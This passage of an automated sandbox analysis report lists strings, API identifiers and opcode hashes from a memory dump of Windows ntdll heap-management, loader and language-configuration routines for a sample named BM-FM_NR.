                                                                      • PreferredUILanguagesPending, xrefs: 36B85D52
                                                                      • Control Panel\Desktop, xrefs: 36B85CDE
                                                                      • InstallLanguageFallback, xrefs: 36B85BD0
                                                                      • PreferredUILanguages, xrefs: 36B85F51
                                                                      • @, xrefs: 36B85F20
                                                                      • @, xrefs: 36B85DF7
                                                                      • @, xrefs: 36B85FFA
                                                                      • LanguageConfigurationPending, xrefs: 36B85DA1
                                                                      • LanguageConfiguration, xrefs: 36B85FA0
                                                                      • @, xrefs: 36B85BA7
                                                                      • @, xrefs: 36B85D30
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1325123933
                                                                      • Opcode ID: d58b7b5d1c4c2f00a92621d72f9e0c046a57091751a23d0857e51eb91de42692
                                                                      • Instruction ID: 7e774d2d5a715504c4db1b1b6034fb9a6facdd56ce25867a71d6a7a50f45abb9
                                                                      • Opcode Fuzzy Hash: d58b7b5d1c4c2f00a92621d72f9e0c046a57091751a23d0857e51eb91de42692
                                                                      • Instruction Fuzzy Hash: 0E7237B69083919FD351CF29C880BABB7E9FB88754F40492DF99997250EB34D805CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                      • API String ID: 3446177414-1700792311
                                                                      • Opcode ID: d091f5f8c0912806dd1b35aea736566b78f7ef582739a2b5e84235d5f5513ae9
                                                                      • Instruction ID: 4eedffcfce2c743df6b1098fa0ba3636c6064a7067d15db2ca366bfbb921b245
                                                                      • Opcode Fuzzy Hash: d091f5f8c0912806dd1b35aea736566b78f7ef582739a2b5e84235d5f5513ae9
                                                                      • Instruction Fuzzy Hash: 06D1CF79900695EFDB01CFA4C850AEABBF2FF5A754F0480ADE844AB262C739D941CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                      • API String ID: 3446177414-1745908468
                                                                      • Opcode ID: 1eaaa593e22898c021e045f1deb0f5e73dd9eb49cd95d369533e164495cd7d57
                                                                      • Instruction ID: 4943578917f142952d8c88f11d4d7566b78f2fa07641303f77f3f259da751aab
                                                                      • Opcode Fuzzy Hash: 1eaaa593e22898c021e045f1deb0f5e73dd9eb49cd95d369533e164495cd7d57
                                                                      • Instruction Fuzzy Hash: 3E912F799006D5EFDB11DFB8C850A9DBBF6FF49390F148099E840AB251CB3A9941CF12
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                      • API String ID: 0-3532704233
                                                                      • Opcode ID: 24743d1fe44b2c4be41ca7617a951ffd0a4c8a7286e184891e542fed852c2d74
                                                                      • Instruction ID: b4b042e812e04f4c8d3c0f868e693aa27f4fa73a040dd80c0310f7cb134446d0
                                                                      • Opcode Fuzzy Hash: 24743d1fe44b2c4be41ca7617a951ffd0a4c8a7286e184891e542fed852c2d74
                                                                      • Instruction Fuzzy Hash: B1B168B6919355DFD711DF28C890A5FBBE8EB88748F51492EF88897200DB70D908CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlDebugPrintTimes.NTDLL ref: 36B0D879
                                                                        • Part of subcall function 36AE4779: RtlDebugPrintTimes.NTDLL ref: 36AE4817
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-1975516107
                                                                      • Opcode ID: 6db9f0981520eda32c106ce50057105ce0fd5bc59d2bfb92fd96b39150403c7d
                                                                      • Instruction ID: fe48f6dc106dc30e634b14fe384ac4b75d7f6d395000ffeebb76f0f2e2ae4bf7
                                                                      • Opcode Fuzzy Hash: 6db9f0981520eda32c106ce50057105ce0fd5bc59d2bfb92fd96b39150403c7d
                                                                      • Instruction Fuzzy Hash: EA51DC76E043559FEB04DFA4C954B9DBFB2FF44348F205059D900AB281EB79A882CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 36ADD263
                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 36ADD0E6
                                                                      • @, xrefs: 36ADD2B3
                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36ADD06F
                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 36ADD202
                                                                      • @, xrefs: 36ADD09D
                                                                      • @, xrefs: 36ADD24F
                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 36ADD136
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                      • API String ID: 0-1356375266
                                                                      • Opcode ID: 5202aaa8647af47c97c093a65b23b5985f44606e7de0985cfe32732b7508fd7a
                                                                      • Instruction ID: b994c5add99abeef4538d3f798adb63e54e8de0890dc8352f1a6a3fc5860fb20
                                                                      • Opcode Fuzzy Hash: 5202aaa8647af47c97c093a65b23b5985f44606e7de0985cfe32732b7508fd7a
                                                                      • Instruction Fuzzy Hash: 0DA135B1908315DFE321DF25C850B9BB7E8BB84759F11492EFA9896240D774D908CFA3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                      • API String ID: 0-2224505338
                                                                      • Opcode ID: cad920bdc9ac40c3bd7f4d2a1dc96ff6939ddee20daeb56526e6336a2e4db6a9
                                                                      • Instruction ID: 0a60cfddf6f932adae257c91283d926c252ec733a1907808d209947b68a1cc45
                                                                      • Opcode Fuzzy Hash: cad920bdc9ac40c3bd7f4d2a1dc96ff6939ddee20daeb56526e6336a2e4db6a9
                                                                      • Instruction Fuzzy Hash: 5551FF7A5022D4EFEB41CFA4C994E5ABBF8FF086E4F118499ED019B221CA39D950CE51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-523794902
                                                                      • Opcode ID: a86752c1b32e6059ef632466df383913e679b64c042c9f05bc543dcdfeca3151
                                                                      • Instruction ID: 41e5e7ba6c3ab61eb4ba6831cf8d27c6f95294ec3e1aec062f35fa6566f3eb36
                                                                      • Opcode Fuzzy Hash: a86752c1b32e6059ef632466df383913e679b64c042c9f05bc543dcdfeca3151
                                                                      • Instruction Fuzzy Hash: 55420EB56153919FE300CF25C9A0A1BBBE5FF88288F24496EF8958B351DB34D845CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                      • API String ID: 0-122214566
                                                                      • Opcode ID: de8f251377695bbcf959ec3d7009a6fe9c1845d354f5244401b718f3a72a02d7
                                                                      • Instruction ID: 36a71c50f8dbcfadc60632ad1765c61f2a0703d955448907d7ec5b1b683dc10b
                                                                      • Opcode Fuzzy Hash: de8f251377695bbcf959ec3d7009a6fe9c1845d354f5244401b718f3a72a02d7
                                                                      • Instruction Fuzzy Hash: 21C10275E10325ABEB058B65CC90BBEBBF5AF45344F6441A9FC019F290DB76C844C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-4253913091
                                                                      • Opcode ID: d6f918b5e7bbd06633bf9861679f211ede6708e94ac58dbddf75516632ac06b1
                                                                      • Instruction ID: 325faa6024f539b742d974855fc99f4431ecefa8133fa419f6941818ef8ae207
                                                                      • Opcode Fuzzy Hash: d6f918b5e7bbd06633bf9861679f211ede6708e94ac58dbddf75516632ac06b1
                                                                      • Instruction Fuzzy Hash: 14F1AA75A10615DFEB05CF68CCA0B6AB7B5FB44344F2081A8E8059F381DB35E981DFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 3446177414-2283098728
                                                                      • Opcode ID: c4058379718b7e079055c27e746214af49aee8094b6973728d50f5c751565a8c
                                                                      • Instruction ID: 63a057aa79d7955acfac8829befae6d8885d4041852faed2cc21ac3dd80828be
                                                                      • Opcode Fuzzy Hash: c4058379718b7e079055c27e746214af49aee8094b6973728d50f5c751565a8c
                                                                      • Instruction Fuzzy Hash: 5151FD76A04311ABE710FF38CC80A1ABFA1FB84354F14266DE9519B291EB34E805CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Kernel-MUI-Language-SKU, xrefs: 36B0534B
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 36B0519B
                                                                      • WindowsExcludedProcs, xrefs: 36B0514A
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 36B05272
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 36B05167
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: 63ff581abeb0e5e679a12bcfec5684a20a76ce39fb91d2736beb031dd62cd741
                                                                      • Instruction ID: f068fa82d270333e9390c1aecb7fed3c685198742a6128f53e73c70489f9533d
                                                                      • Opcode Fuzzy Hash: 63ff581abeb0e5e679a12bcfec5684a20a76ce39fb91d2736beb031dd62cd741
                                                                      • Instruction Fuzzy Hash: E6F13BB6D10229EFDB11DFA9C980EDEBBB8FF08650F51045AE505A7610EB719E01CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: d529547bc2d9f0eaa7c551b9b31520b6ad329d2ec1fa85e50731d582cdf96b50
                                                                      • Instruction ID: 3afa1b949d1b9ba0f6fa731ee44ed969745666504961453feb1a44f7f728dbed
                                                                      • Opcode Fuzzy Hash: d529547bc2d9f0eaa7c551b9b31520b6ad329d2ec1fa85e50731d582cdf96b50
                                                                      • Instruction Fuzzy Hash: 6AF1E472E006219BDF08CF69C9A067EBFF6EF88240B69416DD856EB380D674E941CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                      • API String ID: 0-3061284088
                                                                      • Opcode ID: fd7e63785cfe70a9af30ac343a84922bf00fbe519a91d587b4f861fe0e436931
                                                                      • Instruction ID: 04b5f40139db96f373631117d0772b905f12220d61eb9f3443a31eb11ad705c6
                                                                      • Opcode Fuzzy Hash: fd7e63785cfe70a9af30ac343a84922bf00fbe519a91d587b4f861fe0e436931
                                                                      • Instruction Fuzzy Hash: 13014C76516290EEE3058739D92DF427BF8EB41771F35408EEC044BAA1CFA9D844DE61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                      • API String ID: 0-2586055223
                                                                      • Opcode ID: a676df2f0ee73d2843bcaf863392e9510169a19e6ac037d66530512a2fa7b196
                                                                      • Instruction ID: 7d2492a02f5ec21a99728d69ae4c6191016d91e650bd6bf739e665e665ac237f
                                                                      • Opcode Fuzzy Hash: a676df2f0ee73d2843bcaf863392e9510169a19e6ac037d66530512a2fa7b196
                                                                      • Instruction Fuzzy Hash: 2A6144756057A0AFE311CB24CD64F5BB7E8EF80794F15046AFD548B291CB34E805CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                      • API String ID: 0-1391187441
                                                                      • Opcode ID: 52f8a4c9e70cbb07237103402edb6d4e69fd744c32597f9ac85421adf2523eb6
                                                                      • Instruction ID: 3170aa7d888b914a95d59e27c773fb365f6da9b7fb6613b6d37928c248b3c664
                                                                      • Opcode Fuzzy Hash: 52f8a4c9e70cbb07237103402edb6d4e69fd744c32597f9ac85421adf2523eb6
                                                                      • Instruction Fuzzy Hash: CD31B276A01219EFDB41DB65CC84F9ABBF8FB457A0F2140A5FC14AB291D734E940CE61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                      • API String ID: 0-1880532218
                                                                      • Opcode ID: f6875f1c0be60a9c721b8f0c0f45ea081444ff61e734471bc05f446edff25abd
                                                                      • Instruction ID: 26925d8a2625f828fecafd04f7c70193ad65e97d4871bb699083c49b88fa5e06
                                                                      • Opcode Fuzzy Hash: f6875f1c0be60a9c721b8f0c0f45ea081444ff61e734471bc05f446edff25abd
                                                                      • Instruction Fuzzy Hash: C22136BAE01210ABD7018B6EDD51BAABBF5FF45748F184069E889E7341EA38D905CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: a2acdb5c5ab674300eb15232852164bf81943f475290c20133dedffa568e15e6
                                                                      • Instruction ID: 4fafabb39c0b389a129a298bb0d4e36e3d472bc8294889566fbb88c3c83e26f5
                                                                      • Opcode Fuzzy Hash: a2acdb5c5ab674300eb15232852164bf81943f475290c20133dedffa568e15e6
                                                                      • Instruction Fuzzy Hash: 7D51EC34E00725EFEB06EB65C858BADBBB4FF44356F20412AEA0297290DB74D911DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                      • API String ID: 0-3178619729
                                                                      • Opcode ID: 413d9b8149450025c8f0f4d6d23fe1e08ac95ed56be12ef3ba692990b8aa1376
                                                                      • Instruction ID: c428392edd70a2cc8dc8da93b8b46ccc6d1eeb97a29aa6615c41b447fa9af97a
                                                                      • Opcode Fuzzy Hash: 413d9b8149450025c8f0f4d6d23fe1e08ac95ed56be12ef3ba692990b8aa1376
                                                                      • Instruction Fuzzy Hash: EE22F2B5A10B55AFEB02DF24C890B6ABBF5FF05704F248499E8458F281DB36D981CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                      • API String ID: 0-1168191160
                                                                      • Opcode ID: e50268f516270e5e2e377573a1751ea33368e4083bc08b6ac962079d940d7eda
                                                                      • Instruction ID: 1ffa09fdbf586b1f8a978252cbb2bddfc51beb27b520dfb86a002204b0d36574
                                                                      • Opcode Fuzzy Hash: e50268f516270e5e2e377573a1751ea33368e4083bc08b6ac962079d940d7eda
                                                                      • Instruction Fuzzy Hash: 42F16EB5E002388BDB20CF19CC90BD9B3B5EF44744F5550E9EA19A7241EB319E85CFA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36AE1648
                                                                      • HEAP[%wZ]: , xrefs: 36AE1632
                                                                      • HEAP: , xrefs: 36AE14B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                      • API String ID: 0-3178619729
                                                                      • Opcode ID: fead1f0421ee5d043213c6b2c1870d4e43eb832bcac60e369beb3b74cd7cb9da
                                                                      • Instruction ID: d30a6c5bccf3ccc6c64d44abf7d7351a077086f622052f20dcc003f6f305be59
                                                                      • Opcode Fuzzy Hash: fead1f0421ee5d043213c6b2c1870d4e43eb832bcac60e369beb3b74cd7cb9da
                                                                      • Instruction Fuzzy Hash: 55E1E1B4A043659BEB14CF29C850BBAFBF5EF48308F24885EE996CB245E734D941CB50
